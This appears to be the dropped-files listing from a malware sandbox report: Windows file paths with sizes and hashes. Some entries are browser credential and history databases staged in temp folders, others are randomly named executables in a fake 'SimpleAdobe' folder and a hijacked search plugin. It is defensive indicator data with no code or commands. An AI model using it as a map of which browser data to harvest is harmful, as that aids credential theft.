C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.jsonFilesize
151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.jsonFilesize
136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.jsonFilesize
150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
9KB
MD5c750c8715c16b713677c970cbfacb692
SHA1b4f655ba8de06f128395754cc9866eaa0bb00140
SHA256dbdbe7f2c36b2f6da8270285993cce3cfcbb6de7fbc7859ca639fd7f44b62d99
SHA512b7af4e25382a8a90fc358e2643b8db2b1011896ff962a3072caba11e8fb3ae633741ec5029a6a46fd7ee0f96969656944317849f608c05b9047ce6fd827b20e0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
28KB
MD5d56c888b4b800df6ac4ab6d309d45ab2
SHA1ed1d1edb6530469f4003c4aa6c440d0e9e8ad5f5
SHA256bb6ecf79f55185097774e74a9175fe8a8ad0e3d8f0b2e3cf4f607117369b6819
SHA512ad5bc1a17d93132aa2c903b1b7a8463620da86af34ebd6b534111807850aeb6fc6490dae84a5335f52581986694b8b06d232d88a3e894c8c8124c6789a562a6f
-
C:\Users\Admin\AppData\Local\Temp\CabCD30.tmpFilesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
C:\Users\Admin\AppData\Local\Temp\TarCE1D.tmpFilesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmpFilesize
680KB
MD54468da54a8b07613269ca5537be5e235
SHA19aded70f0853385c5561fa275a77508edae15111
SHA2560177788e41f30da5d5ac6c66c54fd51c8eac03a1eddc9deb5ff6aefff7821153
SHA5123b7c3a3bfe4e9ec20ba4d04d06270aa9e26a342bc806c092b37d6a97064c0c7b54f75c9242295f03899d1b5deac99b91480d0c4ba23a6bc33f3739f322279313
-
C:\Users\Admin\AppData\Local\Temp\nsp3027.tmp\CR.History.tmpFilesize
148KB
MD590a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA2567cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2
-
C:\Users\Admin\AppData\Local\Temp\nsp3027.tmp\Midex.dllFilesize
126KB
MD5581c4a0b8de60868b89074fe94eb27b9
SHA170b8bdfddb08164f9d52033305d535b7db2599f6
SHA256b13c23af49da0a21959e564cbca8e6b94c181c5eeb95150b29c94ff6afb8f9dd
SHA51294290e72871c622fc32e9661719066bafb9b393e10ed397cae8a6f0c8be6ed0df88e5414f39bc528bf9a81980bdcb621745b6c712f4878f0447595cec59ee33d
-
C:\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\JsisPlugins.dllFilesize
2.1MB
MD5bd94620c8a3496f0922d7a443c750047
SHA123c4cb2b4d5f5256e76e54969e7e352263abf057
SHA256c0af9e25c35650f43de4e8a57bb89d43099beead4ca6af6be846319ff84d7644
SHA512954006d27ed365fdf54327d64f05b950c2f0881e395257b87ba8e4cc608ec4771deb490d57dc988571a2e66f730e04e8fe16f356a06070abda1de9f3b0c3da68
-
C:\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\StdUtils.dllFilesize
195KB
MD57602b88d488e54b717a7086605cd6d8d
SHA1c01200d911e744bdffa7f31b3c23068971494485
SHA2562640e4f09aa4c117036bfddd12dc02834e66400392761386bd1fe172a6ddfa11
SHA512a11b68bdaecc1fe3d04246cfd62dd1bb4ef5f360125b40dadf8d475e603e14f24cf35335e01e985f0e7adcf785fdf6c57c7856722bc8dcb4dd2a1f817b1dde3a
-
C:\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\sciterui.dllFilesize
6.4MB
MD5f40c5626532c77b9b4a6bb384db48bbe
SHA1d3124b356f6495288fc7ff1785b1932636ba92d3
SHA256e6d594047deecb0f3d49898475084d286072b6e3e4a30eb9d0d03e9b3228d60f
SHA5128eabf1f5f6561a587026a30258c959a6b3aa4fa2a2d5a993fcd7069bff21b1c25a648feea0ac5896adcf57414308644ac48a4ff4bdc3a5d6e6b91bc735dc1056
-
C:\Users\Admin\AppData\Local\Temp\spana84J79NJo1TA\D87fZN3R3jFeplaces.sqliteFilesize
5.0MB
MD586c02caf812d95fea7778ad377292b20
SHA11dc1de960cb1a879837502214e2f781c1279e49a
SHA25699b2a94ac75f0976fb0fbd31b5fba4ae635d4eb8252b53448a1b748b28dba249
SHA51205bac454d388e7d87125332a06c3fd5eef58dd7088ffa05660ae759261b291e3d28e33661bd1007882fce1e688fd6a9bbb4cdb4537244cc31520c513c6ec9a08
-
C:\Users\Admin\AppData\Local\Temp\spana84J79NJo1TA\zQL8HduYqybhWeb DataFilesize
92KB
MD59da83032394b54144d4c2a3ae7cdfbce
SHA1b85d3a0ff5006c2c1d7270500d7849d373f597b7
SHA25690708648aa3da58b81497a0bc395507906d89d39583d6ad8dcb4e0d417bdc084
SHA51217cb5c7cf40433e75a6240c2eaffd22bd77f5076c1904041670dd8609769e9c970499f85fc18354782c548fc0739df954dc44a9e1ff40d427a5b4f0d278417f3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0DI63DJ7WXQFA0YIF1KI.tempFilesize
7KB
MD53f5a8de349030e1726c0628d16edc2fc
SHA1f354310a89185ebc0e0859ae703fa8577e84ae21
SHA2565afa571746bdc6e8a3cfe85f48b260ec58e3b88fac99dad9037ab9fcd4fe9cf1
SHA512c6265b8b8cb086785aeea21af9b6e6a2e57489f4b9b30d370b4268fec5fe2a52a5fccf0ed6729d1ada8884e90198493bc58a4117081290d3ddd6fc82a48fe849
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\15kjbvz9.default-release\prefs.jsFilesize
6KB
MD595b31123fa340781237ed2696e7e11cc
SHA193b0d14794baa7cebe9ed776adef4aab0e69e947
SHA256f237f19e39c29f17bc6996c542d9c149a7d99ea3ba25e5c84567afb70b4e1ff7
SHA512ce0f7dfbe013757baf9d7e55bcf96dc91d94e38de4ca12e5f57b300cd14f570ece833c70156b2f6e4627d4ced4d227367bd1f2fd187d178e07366b876bd2b982
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\15kjbvz9.default-release\searchplugins\cdnsearch.xmlFilesize
1KB
MD52869f887319d49175ff94ec01e707508
SHA1e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA25649dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA51263673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b
-
C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exeFilesize
310KB
MD532b4d7ba708e9c781047d2c22e2ca135
SHA1be6c6650ab9fcae98c8201d5eb9c1ed6236e4679
SHA256b19a68a331e011f7731b59ce2faed94dc759e10cd68e6c29b2bbb9e1c85c2b71
SHA512c54f594dec955f2169065e069687b6a70d8e0221d8b4389ddcc26dc642a87eff03c223fa402a03217b20679b21732df0a690ccaecf8a2d4c1f555714bbcff944
-
C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exeFilesize
5.6MB
MD59b9c3e3dbe3ee53a57bfab070ee6be8e
SHA1f30398404ebbb663d796b7415e6fc0fcbac7e458
SHA2569232fd1e7662b3c2ef8bce1e720c6c5ea44606001fd78a59cae59079b3d1c074
SHA5127e407018e7ce1f7cd22718a2c6b0206e7c8eac4191c79ee93e656612a15ad72c601ef8a1afd4ee97d705c90a55d6fa1af15bd0bd23b5be57011033210c057c7a
-
C:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exeFilesize
7.3MB
MD505ff3df4891c23297d2f683cb399f027
SHA16feed9d9fe950a03c23c4f50536d596302731d62
SHA256a9bf1aad75c05487f354377e324a506f4bac15cd23976d92a842c56a3a757122
SHA512a04817abb238753f5859f027e54de2943fb8e1729da08bfdd21a51c4ddd71523704c60820b131a399116b951be6931246ab4b0cfafed7f4370541ddb9511f728
-
C:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exeFilesize
10.9MB
MD5d43ac79abe604caffefe6313617079a3
SHA1b3587d3fa524761b207f812e11dd807062892335
SHA2568b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399
SHA512bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082
-
C:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exeFilesize
4.4MB
MD5308cf2092091a41ad91751f8efd0f5e2
SHA1b08f85469e7d92b1ea5de967147ff73fa8ee63a4
SHA2569eddaeee0273db6e1f1f38a999d67f6fb0d66e0cd574fba65d0fa32e0212c66c
SHA51200bc5c43e39ead3af3e14c0dcd89bc7b504d3901cb77a08e903ad1d564001fd7db8543fcd7c7dfcb14ea8c0f33a052fe29ec98ab649699fa5385129b6360e195
-
C:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exeFilesize
421KB
MD51fc71d8e8cb831924bdc7f36a9df1741
SHA18b1023a5314ad55d221e10fe13c3d2ec93506a6c
SHA256609ef2b560381e8385a71a4a961afc94a1e1d19352414a591cd05217e9314625
SHA51246e5e2e57cb46a96c5645555809713ff9e1a560d2ad7731117ef487d389319f97a339c3427385a313883a45c2b8d17ce9eec5ca2094efa3d432dd03d0ca3bb28
-
C:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exeFilesize
5.8MB
MD560feb08011db31607cee2a5bc1f2206f
SHA1f8f680a3a8ca7eb2058eebdf2f25a95904780988
SHA25620a6c6e35c32583f23b8701d14233fccec6fc68d6fc78dcffbb4da1c53b6b9d2
SHA51271db5d12fd3717085b67fe93b671e0f5f7124e1cc3141197572666bc2f914c9b67ba661d49007ea05c7b0cf05345e376ec3894af6696d120957dbb6ce32d3a87
-
C:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exeFilesize
1.3MB
MD5ff10866584c65b97da14051357bb81e0
SHA1421400516c3075999934fabcaa2a3fb398fa0128
SHA256e8fa8c508dd07c17b2ee3fa9a5ca38d53308a67b00e303d97c79b3d2190a201c
SHA512814829d5a8ee369da2d65f5fd9e458483b36e4b97b1da5265af122cdd27d5b9a3cb1cd968e3d061496140f4626f00dfe6dddc517bf41979c5186d562127c1499
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
\Users\Admin\AppData\Local\Temp\7zS13CF.tmp\Install.exeFilesize
6.6MB
MD50036553125061de9b9a448f0bc78ce98
SHA17a4817fa3a4018f4578635ad59a188fec5e5a871
SHA25618a3248e2ce7da71d56a37212c63563fede2e5661c31af408a8aa7a79bb65e50
SHA512b6dae85606eeb6d63c7ce3f4c2831ff01f5fdfac2823b865bbd2e993982b0c019644d61f03c031cca65971533c9ca6588e53bc94928eab58ecbd64a22303c47e
-
\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exeFilesize
6.3MB
MD55eb736d9438321ef0ac9569dd67cb920
SHA1b1eb4eafeeccc5967c222f6cc4611173817a229b
SHA2567e96cccfcb4400eb451cfe1000f51e3462f5f38b96114b80add7fe0ec8b805a2
SHA51252855934f6d1cf446e702709ab4da83a58815871cbd68a19b95f65dbc50ec7f357b7667c930841513ed34f1afcceb61daa32fd2706d8594d7271f5cdc17e6f63
-
\Users\Admin\AppData\Local\Temp\is-MJILD.tmp\_isetup\_iscrypt.dllFilesize
2KB
MD5a69559718ab506675e907fe49deb71e9
SHA1bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA2562f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63
-
\Users\Admin\AppData\Local\Temp\is-MJILD.tmp\_isetup\_isdecmp.dllFilesize
13KB
MD5a813d18268affd4763dde940246dc7e5
SHA1c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4
-
\Users\Admin\AppData\Local\Temp\is-MJILD.tmp\_isetup\_shfoldr.dllFilesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\jsis.dllFilesize
127KB
MD54b27df9758c01833e92c51c24ce9e1d5
SHA1c3e227564de6808e542d2a91bbc70653cf88d040
SHA256d37408f77b7a4e7c60800b6d60c47305b487e8e21c82a416784864bd9f26e7bb
SHA512666f1b99d65169ec5b8bc41cdbbc5fe06bcb9872b7d628cb5ece051630a38678291ddc84862101c727f386c75b750c067177e6e67c1f69ab9f5c2e24367659f4
-
\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\nsJSON.dllFilesize
36KB
MD5ddb56a646aea54615b29ce7df8cd31b8
SHA10ea1a1528faafd930ddceb226d9deaf4fa53c8b2
SHA25607e602c54086a8fa111f83a38c2f3ee239f49328990212c2b3a295fade2b5069
SHA5125d5d6ee7ac7454a72059be736ec8da82572f56e86454c5cbfe26e7956752b6df845a6b0fada76d92473033ca68cd9f87c8e60ac664320b015bb352915abe33c8
-
\Users\Admin\AppData\Local\Temp\nszE5BF.tmp\thirdparty.dll
Filesize
93KB
-
\Users\Admin\AppData\Local\Temp\{6926FF56-432A-465C-8B2A-02B2C1891F94}\scrt.dll
Filesize
5.7MB
-